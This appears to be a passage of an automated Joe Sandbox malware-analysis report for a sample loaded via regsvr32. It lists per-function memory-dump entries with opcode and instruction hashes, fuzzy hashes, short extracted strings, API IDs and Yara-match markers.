                                                                    • Opcode Fuzzy Hash: 4a5e4fe18fa17051425459feb0137b81b0d343578dbe0cd5a85f108800ca0619
                                                                    • Instruction Fuzzy Hash: 5A516974606608CBDB69DF38D4D57A937E1EF68305F20412DF866C72A2DB70D9258B88
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: A.}
                                                                    • API String ID: 0-2880059976
                                                                    • Opcode ID: 9010837fa6b706847bc4c7b3c9088da85304bc8742fe6f892a790101183beb2f
                                                                    • Instruction ID: 2f0cd8bb00c33d355f5bc07b1ff950bf82d6730f12d3cb6082a6ef1b734ff39e
                                                                    • Opcode Fuzzy Hash: 9010837fa6b706847bc4c7b3c9088da85304bc8742fe6f892a790101183beb2f
                                                                    • Instruction Fuzzy Hash: 8E618FB190078E8FCF48DF68C88A5DE7BB1FB58318F004A1DE86696250D7B49A65CF94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0#
                                                                    • API String ID: 0-456275806
                                                                    • Opcode ID: f4a433f559aee369bf21c69c9b7459dc344cb914e6653285f272d73a33117f3a
                                                                    • Instruction ID: 4563f3e02f76dde2de765371aa44af8a356bdaf4307918038d119139e73a9611
                                                                    • Opcode Fuzzy Hash: f4a433f559aee369bf21c69c9b7459dc344cb914e6653285f272d73a33117f3a
                                                                    • Instruction Fuzzy Hash: A6415E70608B488FC768DF19D4897AABBF1FB99301F404A6DE58AC7251DB70D849CB82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: n)
                                                                    • API String ID: 0-1227437150
                                                                    • Opcode ID: f07ab33c2aa16265c73684704b65c3edc8d50a8e8d1ddfe7d0f50fe867e83bf1
                                                                    • Instruction ID: dd456011ca79f85f31d8ff0d6df60f6896318ebd7e2af4f5172cd91629f08304
                                                                    • Opcode Fuzzy Hash: f07ab33c2aa16265c73684704b65c3edc8d50a8e8d1ddfe7d0f50fe867e83bf1
                                                                    • Instruction Fuzzy Hash: 9761ADB090074E8FCB48DF68D58A5CE7FF0FB68398F204219E856A6260D37496A5CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: H&0
                                                                    • API String ID: 0-1691334370
                                                                    • Opcode ID: 5a191e61a79b4d2933a8800ab4c515fbfaecb0eb7acbf0dede020ee38eb43630
                                                                    • Instruction ID: 434fd06cb4e7b9e5ef59c8cf231445956357c0a0e2562e482aef1b34ca23bdad
                                                                    • Opcode Fuzzy Hash: 5a191e61a79b4d2933a8800ab4c515fbfaecb0eb7acbf0dede020ee38eb43630
                                                                    • Instruction Fuzzy Hash: F8511970519784ABD7D9CF28C4C5B5EBBE0FB88794F90691EF486C62A0CB74C9498B03
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: <+o
                                                                    • API String ID: 0-2035106886
                                                                    • Opcode ID: a127c5cda714885b89af0befeec2260f70d516272a3ffbf2c9e998cd35b08532
                                                                    • Instruction ID: 908cc80fe280ddd0bfa2415e6bae89ce11b1f5b72da4428c53a3215ac7c7145d
                                                                    • Opcode Fuzzy Hash: a127c5cda714885b89af0befeec2260f70d516272a3ffbf2c9e998cd35b08532
                                                                    • Instruction Fuzzy Hash: 7A51DFB090034E8BCB48CF68C9965DE7BB0FB58348F11861DEC26AA350D3B4D664CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 2d
                                                                    • API String ID: 0-3866551247
                                                                    • Opcode ID: 21f6d5c278180fa64e04e12198f4d62966834cfebc9beba359b958e849a1d965
                                                                    • Instruction ID: 258b54a6104a0115c80ff1d617aa7636393a642c0cf89d14f7baa21f525a3413
                                                                    • Opcode Fuzzy Hash: 21f6d5c278180fa64e04e12198f4d62966834cfebc9beba359b958e849a1d965
                                                                    • Instruction Fuzzy Hash: 4641CFB05087858FD358DF68C58A61AFBF1BBCA344F108A1EF685CB260D7B6D945CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ZF{;
                                                                    • API String ID: 0-2351138993
                                                                    • Opcode ID: 1a3b70ac63407bc6b31dbd99811dd9b011c38cdabefff78aa14352df61b26e81
                                                                    • Instruction ID: 7873f037b774218c73d9d67b0eeaf548a3a2a69e6d8f7c9b30684cba1c01e4e1
                                                                    • Opcode Fuzzy Hash: 1a3b70ac63407bc6b31dbd99811dd9b011c38cdabefff78aa14352df61b26e81
                                                                    • Instruction Fuzzy Hash: 525192B180034A8FCB48CF68D48A5DE7FB0FB68398F20461DF956A6250D3B596A4CFD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: o^
                                                                    • API String ID: 0-3380573087
                                                                    • Opcode ID: 0d6f3437d03fe5aa4f51e8e74fa4409d34d0e7854ad8eda007dad4bfdfa39413
                                                                    • Instruction ID: 59a9f6ae0c87b179395b4bbd7662f2404235addd18437060f8b1d9c1d0f8b2e4
                                                                    • Opcode Fuzzy Hash: 0d6f3437d03fe5aa4f51e8e74fa4409d34d0e7854ad8eda007dad4bfdfa39413
                                                                    • Instruction Fuzzy Hash: 97419FB091034A9FCB48DF68C4865CEBFB0FB68394F20561AF856A6250D3B4D6A4CFD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 8N
                                                                    • API String ID: 0-1657423088
                                                                    • Opcode ID: c7b73ac620a1de8d380d3e919fde74086c8d3eb6f51cee4e1f73d7d71f9b17a5
                                                                    • Instruction ID: 05e8e8e61cf54c40f354227930f27795623571b92907d2ce5de0c79af9b5eb72
                                                                    • Opcode Fuzzy Hash: c7b73ac620a1de8d380d3e919fde74086c8d3eb6f51cee4e1f73d7d71f9b17a5
                                                                    • Instruction Fuzzy Hash: 3041B2B180078A8FCF48DF68D88A5DE7BF0FB48344F515619F82AA6250D3B49664CF94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: J3n
                                                                    • API String ID: 0-3694000235
                                                                    • Opcode ID: 5e0585a393d7b877ef62559883b768be0e35881de92711842f1faa0fdb5b3090
                                                                    • Instruction ID: fbc63d1771dd8068db465c214aa1fa6fe3c32017f13d31a40a539671eb8e3db3
                                                                    • Opcode Fuzzy Hash: 5e0585a393d7b877ef62559883b768be0e35881de92711842f1faa0fdb5b3090
                                                                    • Instruction Fuzzy Hash: 9241B2B090034A8FCB48CF64D48A5DEBFF0FB68398F104619E819A6250D3B496A5CFD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: c&A
                                                                    • API String ID: 0-649646960
                                                                    • Opcode ID: 222d628d9e4dbd3e938f419e6eccfde97dede3f6fc3ed5f8b1cf47718be42e18
                                                                    • Instruction ID: 5c1e29145451eb3f41bdf5aebc87db8614fe3fe022aa4abe865b5bb925589833
                                                                    • Opcode Fuzzy Hash: 222d628d9e4dbd3e938f419e6eccfde97dede3f6fc3ed5f8b1cf47718be42e18
                                                                    • Instruction Fuzzy Hash: A041B2B490038E8FCF48DF68D8465DE7BB0FF58348F114619E865A6250D3B8D665CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (3
                                                                    • API String ID: 0-2570504824
                                                                    • Opcode ID: a8e5f93200cbe41d1aa1f83add337e38aaec9fa9aeab5943e76885fb2eb57509
                                                                    • Instruction ID: 078cae481ecab5ebae8a44fc1aa70e5a526d9ef7cdb5a4e390aeab476efd0bb7
                                                                    • Opcode Fuzzy Hash: a8e5f93200cbe41d1aa1f83add337e38aaec9fa9aeab5943e76885fb2eb57509
                                                                    • Instruction Fuzzy Hash: 8641E1B190034E8BCB48DF65C89A4EE7FB0FB58388F10461DE856AB250D37496A9CFD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: [r\^
                                                                    • API String ID: 0-4041245994
                                                                    • Opcode ID: 7e09be878869778b676359d511607d642bff81e0c723db1b86f2cce54c765f10
                                                                    • Instruction ID: bef136deadb7757a9af36730b388b650d276232742e73576b67fc962b3bf4495
                                                                    • Opcode Fuzzy Hash: 7e09be878869778b676359d511607d642bff81e0c723db1b86f2cce54c765f10
                                                                    • Instruction Fuzzy Hash: A841E2B090034E8FCB48DFA4D48A5DE7FB1FB58358F10861DE85AA6210C3B896A4CFD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X
                                                                    • API String ID: 0-1684620495
                                                                    • Opcode ID: e5059ebb106ab31542f79bed70f85174c6c5fb64cd94bc4155e3ee01b83e8653
                                                                    • Instruction ID: c074d48008b4f0de6335b08329d09b3dcf7b4425e670a70b5eb694557c772c54
                                                                    • Opcode Fuzzy Hash: e5059ebb106ab31542f79bed70f85174c6c5fb64cd94bc4155e3ee01b83e8653
                                                                    • Instruction Fuzzy Hash: CD31C27050074A8BCF48DF68C48A5DE7FA1BB68388F204619F85A96250D3B896A9CBC4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: [[x
                                                                    • API String ID: 0-2553898450
                                                                    • Opcode ID: fce498f01d1264328632f2ce3828285d2b3a4cfcf13af4523760d9f610b529f8
                                                                    • Instruction ID: a8e0a129d75fff214b9f34755e9293911d3f443417a5185f62d90841b3dbcaf2
                                                                    • Opcode Fuzzy Hash: fce498f01d1264328632f2ce3828285d2b3a4cfcf13af4523760d9f610b529f8
                                                                    • Instruction Fuzzy Hash: 8031AF701087848BD759DF68D48A51EFFF1FBC5398F500A0CF68286260D7B6E889CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: g\&
                                                                    • API String ID: 0-1994035986
                                                                    • Opcode ID: f1cd2deb5ac8493e30d5546e6bad4ad0a2e3582185550e3a432f48c3f1068d26
                                                                    • Instruction ID: 78d7b7b30cf9cde697684abc63e3144e4f3c104511914dfd36499d518091e057
                                                                    • Opcode Fuzzy Hash: f1cd2deb5ac8493e30d5546e6bad4ad0a2e3582185550e3a432f48c3f1068d26
                                                                    • Instruction Fuzzy Hash: 49419FB090034E8FCB45CF64D48A5DEBFF0FB68788F204619E855A6220D37496A9CFD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X
                                                                    • API String ID: 0-1684620495
                                                                    • Opcode ID: d6f38c749d7bf2c025576eea968cfd60362aaf86b7b5e01395e428e1a7e85413
                                                                    • Instruction ID: 6a57ff0d0e6417dcb220414ddd6fd05f9d25965c1474ecef6a781787815c5441
                                                                    • Opcode Fuzzy Hash: d6f38c749d7bf2c025576eea968cfd60362aaf86b7b5e01395e428e1a7e85413
                                                                    • Instruction Fuzzy Hash: 0F317FB06187858B8348DF28C45A41ABBE1FB8D31DF504B1DF8CAA7390D738D656CB4A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GfMu
                                                                    • API String ID: 0-241548529
                                                                    • Opcode ID: 8a67e3bf7b4199a1d3604c9779ca93a2bad0c6c3acd17a475ebbae523034d89b
                                                                    • Instruction ID: 459bd1ae445ea4b99a05d17f5b7f57a0228a98ad0e4316bc4572b1ae85115cb6
                                                                    • Opcode Fuzzy Hash: 8a67e3bf7b4199a1d3604c9779ca93a2bad0c6c3acd17a475ebbae523034d89b
                                                                    • Instruction Fuzzy Hash: 3F31A4B080034E9FCB44DF65C88A5DE7FB0FB28398F118619E859A6254D3B8D6A5CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: k|
                                                                    • API String ID: 0-998972391
                                                                    • Opcode ID: 6236ffa949a3ca0ec4882c0e2f53e6d4deed0830cebabbf337115adf18185b80
                                                                    • Instruction ID: 2ac7c004f44a328b632a383646e80911aebdd3a2d92afb1c4fde4e6b566515e4
                                                                    • Opcode Fuzzy Hash: 6236ffa949a3ca0ec4882c0e2f53e6d4deed0830cebabbf337115adf18185b80
                                                                    • Instruction Fuzzy Hash: 0E316BB55187858BC348DF28C44A41ABBE0FB8D70DF401B2EF4CAAA254D778D646CB4B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: wz_
                                                                    • API String ID: 0-2163964638
                                                                    • Opcode ID: b40e6b262b7e1498d3f21ab3c4cda150b043a181806bf38e185a76218508c891
                                                                    • Instruction ID: 85abef5d63a3cc0fc3de64b3cbe2355aa0dee9f977196367498a1db9d5329f65
                                                                    • Opcode Fuzzy Hash: b40e6b262b7e1498d3f21ab3c4cda150b043a181806bf38e185a76218508c891
                                                                    • Instruction Fuzzy Hash: 1B31A3B190438E9FCB84CF64D88A5DE7BB0FB58358F104A19EC69A6210D3B4C665CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: {?Q
                                                                    • API String ID: 0-927583641
                                                                    • Opcode ID: 839c14ccb0eb6183acb001e089a9759e5faeed76da85f154f8e90dad145701fc
                                                                    • Instruction ID: 7795a7564029993a5c8c4ac1e25182a2d51a1c6f7b8e281b16b6dc8244c6ef4e
                                                                    • Opcode Fuzzy Hash: 839c14ccb0eb6183acb001e089a9759e5faeed76da85f154f8e90dad145701fc
                                                                    • Instruction Fuzzy Hash: A431A4B4529780ABC788DF28C49691EBBF1FBC9314F806A1CF9868A350D775D855CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: |}6\
                                                                    • API String ID: 0-3074799505
                                                                    • Opcode ID: 23fa338bd40b2aad003d9f0634311d3454ffb754a67c2adf2f847410751a50d9
                                                                    • Instruction ID: deee1345628e574e08842a382b14917b2dc53efdf1581624b2725d4aab218cc2
                                                                    • Opcode Fuzzy Hash: 23fa338bd40b2aad003d9f0634311d3454ffb754a67c2adf2f847410751a50d9
                                                                    • Instruction Fuzzy Hash: 06216EB4529380AB8388DF29C48981EBBF0FBC9344F906A1EF88696364D775D445CB02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 3&a
                                                                    • API String ID: 0-537350193
                                                                    • Opcode ID: beaf1e19c187a0f85b52ebc77c111716efe920449ad97bd8647c465ec4e93b8f
                                                                    • Instruction ID: 8a645f8d3c8cc56bac308d2d2ecdfd486002fa9c5fd877c3d873e02a569d50ca
                                                                    • Opcode Fuzzy Hash: beaf1e19c187a0f85b52ebc77c111716efe920449ad97bd8647c465ec4e93b8f
                                                                    • Instruction Fuzzy Hash: 39216E74528781AFC788DF28D49981FBBE1FB88304F806A1DF88687360D774D459CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: o0:X
                                                                    • API String ID: 0-645126758
                                                                    • Opcode ID: 16e91aede479f97639727f95d3587bc05ccff40046920f17c5bc1350390a4fa4
                                                                    • Instruction ID: 22f452758bb10e6d75f49cffb2921ccf5c0237a957934827f7fc810dfbc33e73
                                                                    • Opcode Fuzzy Hash: 16e91aede479f97639727f95d3587bc05ccff40046920f17c5bc1350390a4fa4
                                                                    • Instruction Fuzzy Hash: AC2168B060C7848BD348DF68C49691ABBE0FB9D358F504B1DF4CAAA261D3789645CB4A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: D4}
                                                                    • API String ID: 0-491520632
                                                                    • Opcode ID: e694fe3bb7f23863c566d88b3f3e9b79af36947dfdaac95326105a138b36f14b
                                                                    • Instruction ID: bbb3bee9fa9cdc8f6282772afd18f295cdd348f2c7f059baa6db29b6d6e0bb5b
                                                                    • Opcode Fuzzy Hash: e694fe3bb7f23863c566d88b3f3e9b79af36947dfdaac95326105a138b36f14b
                                                                    • Instruction Fuzzy Hash: A9215DB550C3848BC788DF28C49651BBBE1BB8C318F444B2DF4CAAA365D7789654CF4A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate_errno_getptd
                                                                    • String ID:
                                                                    • API String ID: 1583075380-0
                                                                    • Opcode ID: b49a52df605eb860e81aecf945551c905b422740176ff48a34f4eb53aef691de
                                                                    • Instruction ID: 837737e7a23196a94d1ec805671ff5fe8d19e583ca88f3514c8cd26c1f9d7872
                                                                    • Opcode Fuzzy Hash: b49a52df605eb860e81aecf945551c905b422740176ff48a34f4eb53aef691de
                                                                    • Instruction Fuzzy Hash: 39A19432F1858141DB749F359A257AEA2A2BB85BC4F489135DE4D97F95CE3CE1118304
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d9410001777fc81e6582bcbf2c9e1b051a8f1f2b874c05684980e9ac5d71aab9
                                                                    • Instruction ID: f4ad761ee9f27d0995070b147e332bdf7fc68385d690035b47a8aa45d70d9cfc
                                                                    • Opcode Fuzzy Hash: d9410001777fc81e6582bcbf2c9e1b051a8f1f2b874c05684980e9ac5d71aab9
                                                                    • Instruction Fuzzy Hash: 8171C576F181464BD36C8B28DD6167CA6E6F7E4304F58A135D90ACABB4EE39FA008744
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5d0a71211182b7f87b6da8fb5c4bb16c050ce1c1bc57c3eb72ccfc764dcd8f25
                                                                    • Instruction ID: 8540b9e78b3a5a21de6b0995fa07f246b5a6616f24314d9c292e70c997d69f1a
                                                                    • Opcode Fuzzy Hash: 5d0a71211182b7f87b6da8fb5c4bb16c050ce1c1bc57c3eb72ccfc764dcd8f25
                                                                    • Instruction Fuzzy Hash: 03916670904B0D8BDF48DF94C48A1EEBBF1FB48358F15821DE84AA7250DB749A89CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: efccbdecd07d61b7fd9807909e593046fc70b22fd17ef27bebbdee29ceef9f7a
                                                                    • Instruction ID: b4cc55b2ba55f7836136ac8b5ed3643aad821ec95d31101853fef74eb9d9cec8
                                                                    • Opcode Fuzzy Hash: efccbdecd07d61b7fd9807909e593046fc70b22fd17ef27bebbdee29ceef9f7a
                                                                    • Instruction Fuzzy Hash: FF51787090470DABDBA9CF64C4893EEBBF0FB48354F60806DE85697390DB749A85CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
